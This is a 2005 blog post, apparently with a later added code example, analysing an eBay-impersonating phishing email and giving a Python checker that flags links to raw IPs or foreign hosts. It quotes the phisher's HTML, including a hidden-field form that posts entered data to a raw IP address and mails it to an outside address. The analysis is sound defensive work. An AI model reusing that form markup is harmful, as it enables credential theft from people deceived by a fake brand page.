September 15, 2005

How eBay can help stop Phishing

Technical Discussions — Sarah King

I just received a sternly worded email from "eBay", of which I am not a registered user. Out of curiosity I decided to view the source of the email and see which tricks this nasty Phisher had employed.

I copied one of their links and was taken to a page on this server: http://64.4.16.250/cgi-bin/linkrd? This clever little page interrogated the server variables for info about my PC:

HTML:
  <html><head><title> - More Useful Everyday</title></head>Your email message has been idle and this link has become inactive. To access the link, <a href="javascript:window.close();">close this window and return to your </a> Message. Then click the browser's Refresh button or close your message and reopen it.</html>
  <!-- H: BAY22-F20.phx.gbl -->
  <!-- V: WIN2K3 10.21.0000.0016 i -->
  <!-- D: Aug  8 2005 14:46:21-->
  <!-- S: 0-->

The form itself had this info in it:

HTML:
  <form action="http://84.243.125.22/mailgate.php" method=post>
  <input type="hidden" name="mailto" value="devphobia@yahoo.com"/>
  <input type="hidden" name="subject" value="e-bay account"/>
  <input type="hidden" name="redirect" value="www.ebay.com"/>

In my other Phishing emails post I talk about how you should check where the links are pointing to, and to check it out before doing anything. Well, this email was littered with valid eBay links, for the images and other info. That makes it really hard to determine what is what.
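
One way to automate the link check described above, added here as an example and not part of the original post: the Python code below treats the sites the images load from as the claimed brand and reports any link or form target that is a raw IP address or sits on a different site. The names suspicious_targets, _Collector and SAMPLE are hypothetical, the sample email is constructed from the fragments quoted in this post, and comparing only the last two host labels is a simplifying assumption.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample: tags quoted in this post plus one made-up eBay anchor.
SAMPLE = """
<img height=16 src="https://scgi.ebay.com/saw/pics/sitewide/processBar1_16x16.gif" width=16/>
<a href="http://www.ebay.com/">eBay</a>
<form action="http://84.243.125.22/mailgate.php" method=post>
</form>
"""

class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.images, self.targets = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = {"a": a.get("href"), "form": a.get("action")}.get(tag)
        if tag == "img" and a.get("src"):
            self.images.append(a["src"])
        elif url:
            self.targets.append((tag, url))

def _site(host):
    # Assumption: the last two labels identify the site (wrong for e.g. co.uk).
    return ".".join(host.lower().split(".")[-2:])

def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def suspicious_targets(html):
    """Return (tag, url, reason) for link and form targets that leave the image sites."""
    c = _Collector()
    c.feed(html)
    brand = {_site(urlparse(u).hostname or "") for u in c.images} - {""}
    found = []
    for tag, url in c.targets:
        host = urlparse(url).hostname
        if not host:
            continue  # javascript:, mailto: and relative URLs carry no host
        if _is_ip(host):
            found.append((tag, url, "raw IP address"))
        elif brand and _site(host) not in brand:
            found.append((tag, url, "host differs from image hosts"))
    return found
```

On the sample it reports only the form that posts to http://84.243.125.22/mailgate.php; the eBay-hosted image and link pass.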

I found it unnecessary and worrying that the Phishers were able to use eBay's own images, such as an image from eBay. If it's broken then they've fixed it!

HTML:
  <img height=16 src="https://scgi.ebay.com/saw/pics/sitewide/processBar1_16x16.gif" width=16/>

and

HTML:
  <img height=3 src="https://scgi.ebay.com/saw/pics/sitewide/leftLine_16x3.gif" width=16 align=middle/>

Now the use of a border isn't going to do much, but at least make it difficult and prevent hotlinking outside the domain!


2 Comments »

  1. And if using their formatting graphics isn’t bad enough, today I have one using their logo…

    Comment by sarahk — September 17, 2005 @ 7:43 am

  2. I just discovered the Anti-Phishing Working Group. eBay is a member.

    Comment by sarahk — October 23, 2005 @ 10:13 am
